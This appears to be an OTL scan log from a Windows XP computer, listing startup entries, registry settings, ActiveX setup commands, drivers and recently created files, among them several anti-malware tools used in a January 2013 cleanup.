O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (no name) - - No CLSID value found.
O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKCU\..\Toolbar\ShellBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKCU\..\Toolbar\WebBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe (HP)
O4 - HKLM..\Run: [Logitech Utility] C:\WINDOWS\LOGI_MWX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [Windstream_BCUC_McciTrayApp] C:\Program Files\Windstream_BCUC\McciTrayApp.exe (Alcatel-Lucent)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe (SUPERAntiSpyware.com)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.micr...heckControl.cab (Windows Genuine Advantage Validation Tool)
O16 - DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} http://cdn.scan.onec...lscbase6770.cab (Windows Live Safety Center Base Module)
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} http://www.update.mi...b?1192293460281 (MUWebControl Class)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.m...ash/swflash.cab (Shockwave Flash Object)
O16 - DPF: {EFD3EA56-234D-4240-90EA-CC9FA3AF5A01} https://care.windstr...TELControls.cab (ConnectivityTester Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{4B8689F4-82D6-40F3-A1C1-1A5487DCE17D}: DhcpNameServer = 192.168.1.1
O18 - Protocol\Handler\cetihpz {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll (Hewlett-Packard Company)
O20 - HKLM Winlogon: Shell - (Explorer.exe) -C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) -C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\igfxcui: DllName - (igfxsrvc.dll) - C:\WINDOWS\System32\igfxsrvc.dll (Intel Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2004/05/12 00:25:35 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O32 - AutoRun File - [2013/01/18 19:26:54 | 000,000,000 | R--D | M] - C:\autorun.inf -- [ NTFS ]
O32 - AutoRun File - [2013/01/18 19:26:56 | 000,000,000 | R--D | M] - D:\autorun.inf -- [ FAT32 ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*

NetSvcs: 6to4 - File not found
NetSvcs: AppMgmt - File not found
NetSvcs: HidServ - File not found
NetSvcs: Ias - File not found
NetSvcs: Iprip - File not found
NetSvcs: Irmon - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

MsConfig - StartUpFolder: C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe - (Hewlett-Packard Co.)
MsConfig - StartUpFolder: C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Logitech Desktop Messenger.lnk - Reg Error: Value error. - File not found
MsConfig - StartUpReg: Alcmtr - hkey= - key= - C:\WINDOWS\ALCMTR.EXE (Realtek Semiconductor Corp.)
MsConfig - StartUpReg: AlcWzrd - hkey= - key= - C:\WINDOWS\ALCWZRD.EXE (RealTek Semicoductor Corp.)
MsConfig - StartUpReg: AppleSyncNotifier - hkey= - key= - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe (Apple Inc.)
MsConfig - StartUpReg: BackupNotify - hkey= - key= - c:\Program Files\HP\Digital Imaging\bin\BackupNotify.exe (Hewlett-Packard Company)
MsConfig - StartUpReg: ctfmon.exe - hkey= - key= - File not found
MsConfig - StartUpReg: DAEMON Tools Lite - hkey= - key= - C:\Program Files\DAEMON Tools Lite\daemon.exe (DT Soft Ltd)
MsConfig - StartUpReg: HotKeysCmds - hkey= - key= - File not found
MsConfig - StartUpReg: HP Component Manager - hkey= - key= - C:\Program Files\HP\hpcoretech\hpcmpmgr.exe (Hewlett-Packard Company)
MsConfig - StartUpReg: HP Software Update - hkey= - key= - C:\Program Files\HP\HP Software Update\hpwuSchd2.exe (Hewlett-Packard)
MsConfig - StartUpReg: HPHmon05 - hkey= - key= - File not found
MsConfig - StartUpReg: HPHUPD05 - hkey= - key= - c:\Program Files\HP\{45B6180B-DCAB-4093-8EE8-6164457517F0}\hphupd05.exe (Hewlett-Packard)
MsConfig - StartUpReg: hpqSRMon - hkey= - key= - C:\Program Files\HP\Digital Imaging\bin\HpqSRmon.exe (Hewlett-Packard)
MsConfig - StartUpReg: IgfxTray - hkey= - key= - File not found
MsConfig - StartUpReg: iTunesHelper - hkey= - key= - C:\Program Files\iTunes\iTunesHelper.exe (Apple Inc.)
MsConfig - StartUpReg: KernelFaultCheck - hkey= - key= - File not found
MsConfig - StartUpReg: MSMSGS - hkey= - key= - C:\Program Files\Messenger\msmsgs.exe (Microsoft Corporation)
MsConfig - StartUpReg: Recguard - hkey= - key= - C:\WINDOWS\SMINST\Recguard.exe ()
MsConfig - StartUpReg: SoundMan - hkey= - key= - C:\WINDOWS\SOUNDMAN.EXE (Realtek Semiconductor Corp.)
MsConfig - State: "system.ini" - 0
MsConfig - State: "win.ini" - 0
MsConfig - State: "bootini" - 0
MsConfig - State: "services" - 0
MsConfig - State: "startup" - 2

SafeBootMin: !SASCORE - File not found
SafeBootMin: AppMgmt - File not found
SafeBootMin: Base - Driver Group
SafeBootMin: Boot Bus Extender - Driver Group
SafeBootMin: Boot file system - Driver Group
SafeBootMin: File system - Driver Group
SafeBootMin: Filter - Driver Group
SafeBootMin: PCI Configuration - Driver Group
SafeBootMin: PNP Filter - Driver Group
SafeBootMin: Primary disk - Driver Group
SafeBootMin: SCSI Class - Driver Group
SafeBootMin: sermouse.sys - Driver
SafeBootMin: System Bus Extender - Driver Group
SafeBootMin: vds - Service
SafeBootMin: vga.sys - Driver
SafeBootMin: WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)
SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootNet: !SASCORE - File not found
SafeBootNet: AppMgmt - File not found
SafeBootNet: Base - Driver Group
SafeBootNet: Boot Bus Extender - Driver Group
SafeBootNet: Boot file system - Driver Group
SafeBootNet: File system - Driver Group
SafeBootNet: Filter - Driver Group
SafeBootNet: NDIS Wrapper - Driver Group
SafeBootNet: NetBIOSGroup - Driver Group
SafeBootNet: NetDDEGroup - Driver Group
SafeBootNet: Network - Driver Group
SafeBootNet: NetworkProvider - Driver Group
SafeBootNet: PCI Configuration - Driver Group
SafeBootNet: PNP Filter - Driver Group
SafeBootNet: PNP_TDI - Driver Group
SafeBootNet: Primary disk - Driver Group
SafeBootNet: SCSI Class - Driver Group
SafeBootNet: sermouse.sys - Driver
SafeBootNet: Streams Drivers - Driver Group
SafeBootNet: System Bus Extender - Driver Group
SafeBootNet: TDI - Driver Group
SafeBootNet: vga.sys - Driver
SafeBootNet: WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)
SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)
ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608555} - Internet Explorer Classes for Java
ActiveX: {0fde1f56-0d59-4fd7-9624-e3df6b419d0f} - IEEX
ActiveX: {10072CEC-8CC1-11D1-986E-00A0C955B42F} - Vector Graphics Rendering (VML)
ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - NetShow
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 6.4
ActiveX: {283807B5-2C60-11D0-A31D-00AA00B92C03} - DirectAnimation
ActiveX: {2A3320D6-C805-4280-B423-B665BDE33D8F} - Microsoft .NET Framework 1.1 Security Update (KB979906)
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {3bf42070-b3b1-11d1-b5c5-0000f8051515} - Uniscribe
ActiveX: {411EDCF7-755D-414E-A74B-3DCD6583F589} - Microsoft .NET Framework 1.1 Service Pack 1 (KB867460)
ActiveX: {4278c270-a269-11d1-b5bf-0000f8051515} - Advanced Authoring
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install
ActiveX: {44BBA842-CC51-11CF-AAFA-00AA00B6015B} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT
ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - DirectShow
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015C} - Microsoft DirectX
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.8
ActiveX: {5945c046-1e7d-11d1-bc44-00c04fd912be} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser
ActiveX: {5A8D6EE0-3E18-11D0-821E-444553540000} - ICW
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6C298884-91FD-408C-9D90-5A59D2C29FD1} - Microsoft .NET Framework 1.1 Security Update (KB2742597)
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7131646D-CD3C-40F4-97B9-CD9E4E6262EF} - .NET Framework
ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Web Folders
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\WINDOWS\system32\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - c:\WINDOWS\system32\Rundll32.exe c:\WINDOWS\system32\mscories.dll,Install
ActiveX: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files\Google\Chrome\Application\24.0.1312.52\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
ActiveX: {8b15971b-5355-4c82-8c07-7e181ea07608} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\fxsocm.inf,Fax.Install.PerUser
ActiveX: {8F736E10-8E5C-4399-A532-D0C00A406227} - Microsoft .NET Framework 1.1 Security Update (KB2698023)
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {94de52c8-2d59-4f1b-883e-79663d2d9a8c} - Fax Provider
ActiveX: {96543d59-497a-4801-a1f3-5936aacaf7b1} - Q828750
ActiveX: {B508B3F1-A24A-32C0-B310-85786919EF28} - .NET Framework
ActiveX: {C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F} - .NET Framework
ActiveX: {C3C986D6-06B1-43BF-90DD-BE30756C00DE} - RevokedRootsUpdate
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1} - .NET Framework
ActiveX: {CC2A9BA0-3BDD-11D0-821E-444553540000} - Task Scheduler
ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1
ActiveX: {D27CDB6E-AE6D-11CF-96B8-444553540000} - Macromedia Shockwave Flash
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: {eddbec60-89cb-44ef-8291-0850fd28ff6a} - Q832894
ActiveX: {F5776D81-AE53-4935-8E84-B0B283D8BCEF} - Q330994
ActiveX: <{12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\WINDOWS\system32\ieudinit.exe
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\WINDOWS\inf\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\WINDOWS\system32\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
ActiveX: >{881dd1c5-3dcf-431b-b061-f3f88e8be88a} - %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE

Drivers32: msacm.iac2 - C:\WINDOWS\System32\iac25_32.ax (Intel Corporation)
Drivers32: msacm.l3acm - C:\WINDOWS\system32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: msacm.sl_anet - C:\WINDOWS\System32\sl_anet.acm (Sipro Lab Telecom Inc.)
Drivers32: msacm.trspch - C:\WINDOWS\System32\tssoft32.acm (DSP GROUP, INC.)
Drivers32: vidc.cvid - C:\WINDOWS\System32\iccvid.dll (Radius Inc.)
Drivers32: vidc.DIVX - C:\WINDOWS\System32\DivX.dll (DivX, Inc.)
Drivers32: vidc.iv31 - C:\WINDOWS\System32\ir32_32.dll ()
Drivers32: vidc.iv32 - C:\WINDOWS\System32\ir32_32.dll ()
Drivers32: vidc.iv41 - C:\WINDOWS\System32\ir41_32.ax (Intel Corporation)
Drivers32: vidc.iv50 - C:\WINDOWS\System32\ir50_32.dll (Intel Corporation)
Drivers32: vidc.LEAD - C:\WINDOWS\System32\LCodcCMP.dll (LEAD Technologies, Inc.)
Drivers32: vidc.yv12 - C:\WINDOWS\System32\DivX.dll (DivX, Inc.)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

========== Files/Folders - Created Within 30 Days ==========

[2013/01/18 22:05:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes' Anti-Malware
[2013/01/18 22:05:15 | 000,021,104 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2013/01/18 22:05:15 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2013/01/18 19:57:47 | 000,518,144 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2013/01/18 19:57:47 | 000,406,528 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2013/01/18 19:57:47 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2013/01/18 19:57:47 | 000,060,416 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2013/01/18 19:57:31 | 000,000,000 | ---D | C] -- C:\Qoobox
[2013/01/18 19:55:49 | 005,023,971 | R--- | C] (Swearware) -- C:\Documents and Settings\Owner\Desktop\ComboFix.exe
[2013/01/18 19:28:14 | 004,732,416 | ---- | C] (AVAST Software) -- C:\Documents and Settings\Owner\Desktop\aswMBR.exe
[2013/01/18 19:26:54 | 000,000,000 | R--D | C] -- C:\autorun.inf
[2013/01/18 19:09:10 | 000,000,000 | ---D | C] -- C:\_OTL
[2013/01/17 15:46:02 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Owner\Desktop\OTL.exe
[2013/01/17 11:28:28 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Owner\Recent
[2013/01/15 20:33:34 | 000,000,000 | ---D | C] -- C:\TDSSKiller_Quarantine
[2013/01/15 20:30:54 | 002,213,976 | ---- | C] (Kaspersky Lab ZAO) -- C:\Documents and Settings\Owner\Desktop\tdsskiller.exe
[2013/01/14 19:26:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\avast! Free Antivirus
[2013/01/14 19:26:18 | 000,021,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2013/01/14 19:26:17 | 000,361,032 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2013/01/14 19:25:48 | 000,035,928 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2013/01/14 19:25:47 | 000,054,232 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2013/01/14 19:25:43 | 000,738,504 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSnx.sys
[2013/01/14 19:25:41 | 000,097,608 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2013/01/14 19:25:41 | 000,089,752 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2013/01/14 19:25:39 | 000,025,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2013/01/14 19:23:24 | 000,041,224 | ---- | C] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2013/01/14 19:23:23 | 000,227,648 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\aswBoot.exe
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2013/01/14 14:23:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\Google Chrome
[2013/01/14 14:12:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Owner\Application Data\SUPERAntiSpyware.com
[2013/01/14 14:11:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\SUPERAntiSpyware
[2013/01/10 21:14:52 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/01/18 22:54:03 | 000,000,362 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/18 22:25:41 | 000,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2013/01/18 22:23:11 | 000,000,187 | ---- | M] () -- C:\WINDOWS\System\hpsysdrv.DAT
[2013/01/18 22:22:56 | 000,000,882 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2013/01/18 22:22:28 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2013/01/18 22:22:27 | 527,814,656 | -HS- | M] () -- C:\hiberfil.sys
[2013/01/18 22:17:04 | 000,000,886 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2013/01/18 22:05:18 | 000,000,795 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
[2013/01/18 20:21:08 | 000,000,027 | ---- | M] () -- C:\WINDOWS\System32\drivers\etc\hosts
[2013/01/18 19:56:03 | 005,023,971 | R--- | M] (Swearware) -- C:\Documents and Settings\Owner\Desktop\ComboFix.exe
[2013/01/18 19:46:28 | 000,000,512 | ---- | M] () -- C:\Documents and Settings\Owner\Desktop\MBR.dat
[2013/01/18 19:29:25 | 004,732,416 | ---- | M] (AVAST Software) -- C:\Documents and Settings\Owner\Desktop\aswMBR.exe
[2013/01/18 19:24:26 | 000,132,597 | ---- | M] () -- C:\Documents and Settings\Owner\Desktop\Flash_Disinfector.exe
[2013/01/17 15:45:50 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Owner\Desktop\OTL.exe
[2013/01/15 20:31:15 | 002,213,976 | ---- | M] (Kaspersky Lab ZAO) -- C:\Documents and Settings\Owner\Desktop\tdsskiller.exe
[2013/01/15 06:30:30 | 000,001,842 | ---- | M] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/14 19:26:20 | 000,001,700 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:43 | 000,002,625 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2013/01/14 14:23:04 | 000,001,824 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2013/01/10 03:19:17 | 000,472,854 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2013/01/10 03:19:17 | 000,079,394 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2013/01/05 23:34:35 | 006,009,856 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mshtml.dll
[2012/12/21 03:18:57 | 000,186,608 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/01/18 22:05:18 | 000,000,795 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
[2013/01/18 19:57:47 | 000,256,000 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2013/01/18 19:57:47 | 000,208,896 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2013/01/18 19:57:47 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2013/01/18 19:57:47 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2013/01/18 19:57:47 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2013/01/18 19:46:28 | 000,000,512 | ---- | C] () -- C:\Documents and Settings\Owner\Desktop\MBR.dat
[2013/01/18 19:24:28 | 000,132,597 | ---- | C] () -- C:\Documents and Settings\Owner\Desktop\Flash_Disinfector.exe
[2013/01/16 06:09:36 | 527,814,656 | -HS- | C] () -- C:\hiberfil.sys
[2013/01/14 19:26:20 | 000,001,700 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:47 | 000,000,362 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/14 14:23:04 | 000,001,842 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/14 14:23:03 | 000,001,824 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2012/02/15 01:03:58 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\iacenc.dll
[2011/12/21 10:45:18 | 000,000,000 | ---- | C] () -- C:\WINDOWS\SETUP32.INI
[2011/10/19 20:54:03 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat
